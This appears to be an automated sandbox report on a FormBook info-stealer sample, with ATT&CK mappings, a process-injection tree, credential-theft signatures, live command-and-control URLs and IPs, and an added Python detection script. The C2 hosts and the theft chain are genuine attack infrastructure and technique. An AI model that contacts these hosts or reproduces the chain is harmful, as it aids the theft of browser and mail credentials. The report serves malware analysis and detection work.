0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | Binary or memory string: WIN_XPe
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | Binary or memory string: WIN_VISTA
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | Binary or memory string: WIN_7
Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | Binary or memory string: WIN_8
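The process-creation, memory-write and credential-store lines above describe a chain a detection engineer can test for directly: svchost.exe started with a command line that names the sample rather than svchost, verclsid.exe started by a payload living in a randomly named directory under Program Files (x86), and that verclsid.exe then opening the Chrome and Edge Login Data, Cookies, Web Data and Local State files and the Outlook profile key. The Python below is an added example written for this report, not Joe Sandbox or FormBook code. The event records are constructed from the observations above in a Sysmon-like shape; the field names, the 40-letter random-directory threshold and the browser and mail-client allowlists are assumptions to be tuned to your own telemetry.

```python
"""Host-side checks for the injection chain and credential-store access this
report describes.  Added example, not Joe Sandbox or FormBook code.  Event
records are constructed from the report in a Sysmon-like shape; field names,
thresholds and allowlists are assumptions."""
import ntpath
import re

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}   # allowlist (assumption)
MAIL_IMAGES = {"outlook.exe"}                                  # allowlist (assumption)
CRED_FILES = {"login data", "cookies", "web data", "local state"}
MAIL_PROFILE_KEY = r"windows messaging subsystem\profiles"
# Heuristic: a path component made of 40+ letters and nothing else, like the
# payload directory in this report.  The threshold is an assumption.
RANDOM_DIR = re.compile(r"^[A-Za-z]{40,}$")

EVENTS = [  # constructed telemetry mirroring the report's observations
    {"type": "process_create", "image": r"C:\Windows\SysWOW64\svchost.exe",
     "parent": r"C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe",
     "cmdline": r'"C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"'},
    {"type": "process_create", "image": r"C:\Windows\SysWOW64\verclsid.exe",
     "parent": r"C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe",
     "cmdline": r'"C:\Windows\SysWOW64\verclsid.exe"'},
    {"type": "file_open", "image": r"C:\Windows\SysWOW64\verclsid.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "reg_open", "image": r"C:\Windows\SysWOW64\verclsid.exe",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"},
    # Benign baseline: the browser reading its own store, and a service host
    # started by services.exe whose command line names svchost itself.
    {"type": "file_open", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "process_create", "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]


def first_token(cmdline):
    """Image path named by a command line: its quoted or space-delimited first token."""
    c = cmdline.strip()
    if c.startswith('"'):
        end = c.find('"', 1)
        return c[1:end] if end > 0 else c[1:]
    return c.split(None, 1)[0]


def check_event(ev):
    """Return a list of (rule, subject) findings for one event."""
    findings = []
    image = ev["image"]
    base = ntpath.basename(image).lower()
    if ev["type"] == "process_create":
        named = ntpath.basename(first_token(ev["cmdline"])).lower()
        if named != base:
            # svchost.exe created with the sample's own path as its command line
            findings.append(("image/command-line mismatch (hollowing)", image))
        if any(RANDOM_DIR.match(part) for part in ev["parent"].split("\\")):
            findings.append(("parent runs from random-named directory", ev["parent"]))
    elif ev["type"] == "file_open":
        target = ev["target"]
        if ("\\user data\\" in target.lower()
                and ntpath.basename(target).lower() in CRED_FILES
                and base not in BROWSER_IMAGES):
            findings.append(("non-browser read of browser credential store", image))
    elif ev["type"] == "reg_open":
        if MAIL_PROFILE_KEY in ev["target"].lower() and base not in MAIL_IMAGES:
            findings.append(("non-mail-client read of Outlook profile key", image))
    return findings


def scan(events):
    """Run every check over the event list and collect the findings."""
    out = []
    for ev in events:
        out.extend(check_event(ev))
    return out


if __name__ == "__main__":
    for rule, subject in scan(EVENTS):
        print(f"{rule}: {subject}")
```

Run against the constructed events, the four verclsid/svchost records produce one finding each and the two benign records produce none. The command-line check is the most portable of the four: a Windows binary whose command line names a different image is exactly what the "Process created: svchost.exe ..." line above records, and it does not depend on the payload's directory name.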

Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function 0_2_004D1204: socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe | Code function 0_2_004D1806: socket, WSAGetLastError, bind, WSAGetLastError, closesocket
MITRE ATT&CK Matrix

Techniques flagged for this sample, grouped by tactic. The number in front of each technique is the count shown in the report's matrix; tactics with no flagged technique (Reconnaissance, Resource Development, Lateral Movement, Exfiltration) show only template cells and are listed as none.

- Reconnaissance: none
- Resource Development: none
- Initial Access: 2 Valid Accounts
- Execution: 1 Native API
- Persistence: 1 DLL Side-Loading; 2 Valid Accounts
- Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection
- Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
- Credential Access: 1 OS Credential Dumping; 21 Input Capture
- Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
- Lateral Movement: none
- Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data
- Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol
- Exfiltration: none
- Impact: 1 System Shutdown/Reboot
Behavior Graph (ID 1590590, start date 14/01/2025, architecture WINDOWS, score 100)

Sample-level observations: contacts xpremio.online, www.thesquare.world and 19 other IPs or domains; Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 7 other signatures.

Process tree:
- Scanned-IMGS_from NomanGroup IDT.scr.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  - svchost.exe (started): Maps a DLL or memory area into another process
    - zalkpCfMwtnpQo.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
      - verclsid.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        - zalkpCfMwtnpQo.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); network: www.nexula.website 67.223.117.142, ports 57374, 57395, 57411 (VIMRO-AS15189US, United States); xpremio.online 84.32.84.32, ports 57616, 57617, 57618 (NTT-LT-ASLT, Lithuania); 7 other IPs or domains
        - firefox.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection (submitted sample)

Source | Detection | Scanner | Label
Scanned-IMGS_from NomanGroup IDT.scr.exe | 36% | Virustotal | -
Scanned-IMGS_from NomanGroup IDT.scr.exe | 45% | ReversingLabs | Win32.Backdoor.FormBook
Scanned-IMGS_from NomanGroup IDT.scr.exe | 100% | Avira | DR/AutoIt.Gen8
Scanned-IMGS_from NomanGroup IDT.scr.exe | 100% | Joe Sandbox ML | -
                No Antivirus matches
URL detections

Source | Detection | Scanner | Label
http://www.scottconsults.top/qjug/ | 0% | Avira URL Cloud | safe
http://quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/L | 0% | Avira URL Cloud | safe
http://www.nexula.website/ro4w/ | 100% | Avira URL Cloud | malware
http://www.2q33e.top/dim8/?wz4=SI5ZCVgJbtC8ikIAaDbl0c4+a+swA4Oej6uVn92gSwZctgLMHnh4qXUXZe4N7Wh4DCFNfNClZUM8FDTYBsBE5loeshCr6I6FGtX7Gz1ZeQkIvaXZY4DJTLc=&OvV=2njD6f80EDOLQ8 | 0% | Avira URL Cloud | safe
http://www.prediksipreman.fyi/rpjd/?wz4=yOJpbVbkgz0HtUwQYARMSThcLcopmrPoDVX6GqNwoWWXZF3pcIj1Y13LV6gW4nMVJ2J858d+IDhJ+laaNqfHK1c6MutgW040XFAhxno1AdPNbACR1ywEbhk=&OvV=2njD6f80EDOLQ8 | 0% | Avira URL Cloud | safe
http://www.livingslab.net/otgv/?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ8 | 0% | Avira URL Cloud | safe
http://www.quickcommerce.cloud/rdfj/ | 0% | Avira URL Cloud | safe
http://www.2q33e.top/dim8/ | 0% | Avira URL Cloud | safe
http://www.prediksipreman.fyi/rpjd/ | 0% | Avira URL Cloud | safe
http://www.scottconsults.top/qjug/?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ8 | 0% | Avira URL Cloud | safe
http://www.wddb97.top/p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso= | 100% | Avira URL Cloud | malware
http://www.quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ8 | 0% | Avira URL Cloud | safe
http://www.7wkto5nk230724z.click/yysf/ | 100% | Avira URL Cloud | malware
http://www.nexula.website/ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8 | 100% | Avira URL Cloud | malware
http://www.wddb97.top/p75v/ | 100% | Avira URL Cloud | malware
http://www.livingslab.net/otgv/ | 0% | Avira URL Cloud | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
2q33e.top | 38.47.233.52 | true | true | - | unknown
scottconsults.top | 3.33.130.190 | true | true | - | unknown
wddb97.top | 206.119.82.172 | true | true | - | unknown
www.nexula.website | 67.223.117.142 | true | true | - | unknown
www.thesquare.world | 13.248.169.48 | true | true | - | unknown
quickcommerce.cloud | 20.244.96.65 | true | true | - | unknown
prediksipreman.fyi | 162.0.215.244 | true | true | - | unknown
www.7wkto5nk230724z.click | 104.21.3.193 | true | true | - | unknown
xpremio.online | 84.32.84.32 | true | true | - | unknown
livingslab.net | 3.33.130.190 | true | true | - | unknown
www.prediksipreman.fyi | unknown | unknown | false | - | unknown
15.164.165.52.in-addr.arpa | unknown | unknown | false | - | high
www.wddb97.top | unknown | unknown | false | - | unknown
www.revolutionmusic.net | unknown | unknown | false | - | unknown
www.livingslab.net | unknown | unknown | false | - | unknown
www.xpremio.online | unknown | unknown | false | - | unknown
www.quickcommerce.cloud | unknown | unknown | false | - | unknown
www.cybermisha.store | unknown | unknown | false | - | unknown
www.2q33e.top | unknown | unknown | false | - | unknown
www.xtelify.tech | unknown | unknown | false | - | unknown
www.scottconsults.top | unknown | unknown | false | - | unknown
URLs (contacted)

Name | Malicious | Antivirus Detection | Reputation
http://www.nexula.website/ro4w/ | true | Avira URL Cloud: malware | unknown
http://www.scottconsults.top/qjug/ | true | Avira URL Cloud: safe | unknown
http://www.prediksipreman.fyi/rpjd/?wz4=yOJpbVbkgz0HtUwQYARMSThcLcopmrPoDVX6GqNwoWWXZF3pcIj1Y13LV6gW4nMVJ2J858d+IDhJ+laaNqfHK1c6MutgW040XFAhxno1AdPNbACR1ywEbhk=&OvV=2njD6f80EDOLQ8 | true | Avira URL Cloud: safe | unknown
http://www.2q33e.top/dim8/?wz4=SI5ZCVgJbtC8ikIAaDbl0c4+a+swA4Oej6uVn92gSwZctgLMHnh4qXUXZe4N7Wh4DCFNfNClZUM8FDTYBsBE5loeshCr6I6FGtX7Gz1ZeQkIvaXZY4DJTLc=&OvV=2njD6f80EDOLQ8 | true | Avira URL Cloud: safe | unknown
http://www.quickcommerce.cloud/rdfj/ | true | Avira URL Cloud: safe | unknown
http://www.scottconsults.top/qjug/?wz4=VcMkcuIRceq81+g9yOCv0sbld0olDHkRvlNhYh95NOpnwjcC/r1DFPFDhAQ/BZSpNAD5Fbv04pxr6m2h9PMUHq+9H+1HT0zuQhfUSGVBQeWRfQVA8fdlyIU=&OvV=2njD6f80EDOLQ8 | true | Avira URL Cloud: safe | unknown
http://www.2q33e.top/dim8/ | true | Avira URL Cloud: safe | unknown
http://www.prediksipreman.fyi/rpjd/ | true | Avira URL Cloud: safe | unknown
http://www.livingslab.net/otgv/?wz4=mPj2soEUEFmq5Xu56Ev9ENs/GIe87AemMTFSPosGtz7M/tXNad3AOcc3teRO2drll+qYOuNJorQ/HJUWSqoYkO/lFhsMOlB8p4kTaBK5nEPe9NarMUavWdI=&OvV=2njD6f80EDOLQ8 | true | Avira URL Cloud: safe | unknown
http://www.wddb97.top/p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso= | true | Avira URL Cloud: malware | unknown
http://www.quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/LgqczUnn1NrDdL/bN6nwlekL5Do//GTuaTPhPlYdtLOoB+gLN1EC4FlrA=&OvV=2njD6f80EDOLQ8 | true | Avira URL Cloud: safe | unknown
http://www.wddb97.top/p75v/ | true | Avira URL Cloud: malware | unknown
http://www.nexula.website/ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8 | true | Avira URL Cloud: malware | unknown
http://www.livingslab.net/otgv/ | true | Avira URL Cloud: safe | unknown
http://www.7wkto5nk230724z.click/yysf/ | true | Avira URL Cloud: malware | unknown
URLs (found in memory)

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://quickcommerce.cloud/rdfj/?wz4=W22N1n9VK5BsDegKssi59d1tdmClQzQM6krhrjkO5qQUOhZ23fqPP0igRbfRb/L | verclsid.exe, 00000003.00000002.3550509142.0000000006A28000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.00000000046D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer | verclsid.exe, 00000003.00000002.3550509142.00000000060BC000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.0000000003D6C000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | verclsid.exe, 00000003.00000003.2022626569.000000000807D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
206.119.82.172 | wddb97.top | United States | 174 | COGENT-174US | true
67.223.117.142 | www.nexula.website | United States | 15189 | VIMRO-AS15189US | true
162.0.215.244 | prediksipreman.fyi | Canada | 35893 | ACPCA | true
13.248.169.48 | www.thesquare.world | United States | 16509 | AMAZON-02US | true
104.21.3.193 | www.7wkto5nk230724z.click | United States | 13335 | CLOUDFLARENETUS | true
20.244.96.65 | quickcommerce.cloud | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
38.47.233.52 | 2q33e.top | United States | 174 | COGENT-174US | true
84.32.84.32 | xpremio.online | Lithuania | 33922 | NTT-LT-ASLT | true
3.33.130.190 | scottconsults.top | United States | 8987 | AMAZONEXPANSIONGB | true
                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1590590
                                                                              Start date and time:2025-01-14 10:23:07 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 9m 11s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Run name:Run with higher sleep bypass
Number of new started processes analysed:8
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:2
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Scanned-IMGS_from NomanGroup IDT.scr.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@14/9
                                                                              EGA Information:
                                                                              • Successful, ratio: 75%
                                                                              HCA Information:
                                                                              • Successful, ratio: 90%
                                                                              • Number of executed functions: 44
                                                                              • Number of non-executed functions: 302
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 52.165.164.15, 20.109.210.53, 13.107.253.45
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
206.119.82.172 | fHkdf4WB7zhMcqP.exe | malicious | FormBook | www.wddb97.top/cjue/
206.119.82.172 | wODub61gZe.exe | malicious | FormBook | www.d97fw.top/ep96/
206.119.82.172 | DHL_IMPORT_8236820594.exe | malicious | FormBook | www.wddb97.top/a3g3/
206.119.82.172 | DHL_IMPORT_8236820594.exe | malicious | FormBook | www.wddb97.top/a3g3/
206.119.82.172 | Arrival Notice_pdf.exe | malicious | FormBook | www.d97fw.top/07qt/
206.119.82.172 | RECIEPT.PDF.exe | malicious | FormBook | www.d97fw.top/j0mp/
67.223.117.142 | PO AT-5228.exe | malicious | FormBook | www.flikka.site/brrb/
67.223.117.142 | shipping doc_20241111.exe | malicious | FormBook | www.flikka.site/brrb/
67.223.117.142 | New PO [FK4-7173].pdf.exe | malicious | FormBook | www.maviro.xyz/hcih/
67.223.117.142 | SHIPPING DOC_20241107.exe | malicious | FormBook | www.flikka.site/brrb/
67.223.117.142 | proforma Invoice.exe | malicious | FormBook | www.jorbaq.top/saaz/
67.223.117.142 | DHL_doc.exe | malicious | FormBook | www.plyvik.info/ak8m/
67.223.117.142 | SecuriteInfo.com.FileRepMalware.20173.21714.exe | malicious | FormBook | www.plyvik.info/yhso/
67.223.117.142 | INVOICES.exe | malicious | FormBook | www.plyvik.info/ak8m/
162.0.215.244 | IbRV4I7MrS.exe | malicious | FormBook | www.prediksipreman.fyi/3lre/
162.0.215.244 | debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe | malicious | FormBook | www.prediksipreman.fyi/fy4q/
162.0.215.244 | NF_Payment_Ref_FAN930276.exe | malicious | FormBook | www.prediksipreman.fyi/3lre/
162.0.215.244 | 18in SPA-198-2024.exe | malicious | FormBook | www.prediksipreman.fyi/3lre/
162.0.215.244 | PO1268931024 - Bank Slip.exe | malicious | PureLog Stealer | www.prediksipreman.fyi/3lre/
162.0.215.244 | http://mirchmasala2go.com | malicious | Unknown | mirchmasala2go.com/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.thesquare.world | Maryam Farokhi-PhD- CV-1403.exe | malicious | FormBook | 13.248.169.48
www.thesquare.world | A4mmSHCUi2.exe | malicious | FormBook | 13.248.169.48
www.7wkto5nk230724z.click | IMPORT PERMITS.exe | malicious | FormBook | 172.67.131.32
www.7wkto5nk230724z.click | draft contract for order #782334.exe | malicious | FormBook | 172.67.131.32
www.7wkto5nk230724z.click | LlbpXphTu9.exe | malicious | Unknown | 104.21.3.193
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VIMRO-AS15189US | ydJaT4b5N8.exe | malicious | FormBook | 67.223.118.94
VIMRO-AS15189US | Nieuwebestellingen10122024.exe | malicious | FormBook | 67.223.117.169
VIMRO-AS15189US | specification and drawing.exe | malicious | FormBook, PureLog Stealer | 67.223.117.169
VIMRO-AS15189US | dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | malicious | FormBook | 67.223.117.169
VIMRO-AS15189US | PO AT-5228.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | shipping doc_20241111.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | fHkdf4WB7zhMcqP.exe | malicious | FormBook | 67.223.118.17
VIMRO-AS15189US | New PO [FK4-7173].pdf.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | SHIPPING DOC_20241107.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | proforma Invoice.exe | malicious | FormBook | 67.223.117.142
ACPCA | Handler.exe | malicious | DanaBot, Vidar | 162.0.209.157
ACPCA | elitebotnet.m68k.elf | malicious | Mirai, Okiru | 162.0.4.79
ACPCA | elitebotnet.mips.elf | malicious | Mirai, Okiru | 162.49.96.105
ACPCA | 3.elf | malicious | Unknown | 162.55.163.200
ACPCA | http://clumsy-sulky-helium.glitch.me/ | malicious | Unknown | 162.55.133.182
ACPCA | UWYXurYZ2x.exe | malicious | LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer | 162.0.209.157
ACPCA | https://mrohailkhan.com/energyaustralia/auth/auhs1/ | malicious | Unknown | 162.0.209.189
ACPCA | n2pGr8w21V.exe | malicious | FormBook | 162.0.215.33
ACPCA | 5by4QM3v89.exe | malicious | FormBook | 162.0.215.91
ACPCA | gKvjKMCUfq.exe | malicious | FormBook | 162.0.213.94
AMAZON-02US | Remittance.html | malicious | Unknown | 108.138.26.50
AMAZON-02US | Absa Remittance Advice.docx | malicious | Unknown | 52.94.140.208
AMAZON-02US | Absa Remittance Advice.docx | malicious | Unknown | 52.94.140.208
AMAZON-02US | 5hsRaLKPV6.jar | malicious | Branchlock Obfuscator | 52.216.210.114
AMAZON-02US | 5hsRaLKPV6.jar | malicious | Branchlock Obfuscator | 52.217.130.90
AMAZON-02US | https://email.lc.haxconsulting.com/c/eJx0k0tv4zgQhH-NdBk4kKgHrQMPdhI5mck78djJRaDIlsSYD4WkpLF__cJOsLvAZq_FLnbhQzWrBCdJS6-fh9_RaK9H9Muk6c9yE3LCCkjrLORGUaGJZGcd_cOMdoP0QrdnzKivt8pMGqzrRF_5fQ-EtqDZvqLOiVYDD4HEOMnxvMB5EoKiQlYKnKMtHLdv5i83BT5n4-tb-75JAbPHy6-p02-Mqp6KVv9LO9pyPE9ZwVKaZjlkgBjkRVEjHIIehTVagfakt4YPzAujw45EeRrF0RziBvIoyeskRxgwwlma0ajAPBQERSiL4jg55o2Ss2YOOYWszps4a5o6CtLoWwySdN73LkgWASoDVE7T9N-pAJXcTFoaymeOSmr3s3YQHGYDhSApG2GdrzRVECQXdyBkgHJJ_5GuqNsJ7QKUnzgEyYUGIbsvNY0644_656a874w-uqIs-lGk6Q-UFjiUrPpkKLQHq6kka1Q6vvq928YBWm7z65vVxHE3FgEq59i-jvvVs0xEw7L6_MK2IhvbP_TKJn77qF7k3TSixbC_V5cBWuI33j_fivpGtZOAqN0Zxga7eJCXr-uXzfMHlIcjgANevhv8USfN_ZM-L_Dhoeu38GTXt4sALYfFzheHl3LNy1VZjw8iQOU6QOWmvb3vrqbc9Y17WtynH9OVVkrF8qdedwDgHtt4eTkPpTn1ebm6Sd7eV-rWxvS93979kt02VOA7wwntRWisaIUm9SB3sxOQsLdmFBwskUA5M1oD88aGlvwv49CZwTIgJ_9MuHE2GbsDG3pyTPFtBE-YUdW31-YJ-Orvpo8E_RUAAP__dHE7Qw | malicious | Unknown | 18.245.31.88
AMAZON-02US | Discord.exe | malicious | AsyncRAT | 3.127.138.57
AMAZON-02US | http://locrmhelp.com | malicious | Unknown | 52.84.151.46
